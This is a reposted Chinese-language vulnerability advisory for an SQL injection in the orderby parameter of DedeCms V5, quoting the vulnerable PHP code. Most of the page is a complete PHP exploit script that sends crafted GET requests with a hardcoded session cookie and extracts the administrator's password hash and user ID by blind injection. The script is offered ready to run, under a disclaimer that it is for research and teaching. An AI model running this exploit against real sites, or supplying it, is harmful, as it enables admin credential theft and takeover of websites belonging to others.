影响版本:

DedeCms V5漏洞描述:

DedeCms由2004年到现在，已经经历了五个版本，从DedeCms V2 开始，DedeCms开发了自己的模板引擎，使用XML名字空间风格的模板，对美工制作的直观性提供了极大的便利，从V2.1开始，DedeCms人气急却上升，成为国内最流行的CMS软件，在DedeCms V3版本中，开始引入了模型的概念，从而摆脱里传统网站内容管理对模块太分散，管理不集中的缺点，但随着时间的发展，发现纯粹用模型化并不能满足用户的需求，从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，如管理员密码，加密key等等，从而控制整个网站。

在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询，造成多个注射漏洞。漏洞部分代码如下

-------------------------------------------------------

if(empty($orderby)) $orderby = 'pubdate';

//重载列表

if($dopost=='getlist'){

PrintAjaxHead();

GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数

$dsql->Close();

exit();

……

function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){

global $cfg_phpurl,$cfg_ml;

$jobs = array();

$start = ($pageno-1) * $pagesize;

$dsql->SetQuery("Select * From sec_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");

$dsql->Execute();//orderby 带入数据库查询

……

----------------------------------------------------------

<*参考

http://www.80sec.com/dedecms-sql-injection.html

*>

测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

print_r('

--------------------------------------------------------------------------------

DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit

BY Flyh4t

www.wolvez.org

Thx for all the members of W.S.T and my friend Oldjun

--------------------------------------------------------------------------------

');

if ($argc<3) {

print_r('

--------------------------------------------------------------------------------

Usage: php '.$argv[0].’ host path

host: target server (ip/hostname)

path: path to DEDEcms

Example:

php ‘.$argv[0].’ localhost /

——————————————————————————–

‘);

die;

}

function sendpacketii($packet)

{

global $host, $html;

$ock=fsockopen(gethostbyname($host),’80′);

if (!$ock) {

echo ‘No response from ‘.$host; die;

}

fputs($ock,$packet);

$html=”;

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}

$host=$argv[1];

$path=$argv[2];

$prefix=”dede_”;

$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))

{echo ‘Error… check the path!’; die;}

/*get $prefix*/

$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0rn”;

$packet.=”Host: “.$host.”rn”;

$packet.=”Cookie: “.$cookie.”rn”;

$packet.=”Connection: Closernrn”;

sendpacketii($packet);

if (eregi(”in your SQL syntax”,$html))

{

$temp=explode(”From “,$html);

$temp2=explode(”member”,$temp[1]);

if($temp2[0])

$prefix=$temp2[0];

echo “[+]prefix -> “.$prefix.”n”;

}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

echo “[~]exploting now,plz waitingrn”;

/*get password*/

$j=1;$password=”";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;

$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;

$packet.=”Host: “.$host.”rn”;

$packet.=”Cookie: “.$cookie.”rn”;

$packet.=”Connection: Closernrn”;

sendpacketii($packet);

if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”rn”;break;}

}

if ($i==255) {die(”Exploit failed…”);}

}

$j++;

}

/*get userid*/

$j=1;$admin=”";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;

$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;

$packet.=”Host: “.$host.”rn”;

$packet.=”Cookie: “.$cookie.”rn”;

$packet.=”Connection: Closernrn”;

sendpacketii($packet);

if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”rn”;break;}

if ($i==255) {die(”Exploit failed…”);}

}

$j++;

}

print_r(’

——————————————————————————–

[+]userid -> ‘.$admin.’

[+]pwd(md5 24位) -> ‘.$password.’

——————————————————————————–

‘);

function is_hash($hash)

{

if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}

else {return false;}

}

if (is_hash($password)) {echo “Exploit succeeded…”;}

else {echo “Exploit failed…”;}

?>爱安全建议:

暂无

http://www.dedecms.com// aianquan.com [2008-08-13]

(本文由责任编辑 pasu 整理发布)

【DedeCms V5 orderby参数注射漏洞】相关文章：

★ OpenBSD DHCPD 服务程序远程栈溢出漏洞

★ DISCUZ X1.5 本地文件包含漏洞

★ phpcms2008 注入漏洞

★ DedeCmsV5.6 本地包含又一利用方式

★ Discuz 娱乐大厅插件V1.0 注入漏洞

★ DeDeCMS V5 用户验证函数转义符漏洞

★ 野草weedcmsV5.2.1 任意删除文件漏洞

★ Discuz论坛短消息未限制发送次数漏洞

★ PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

★ Firebird protocol.cpp XDR协议远程内存破坏漏洞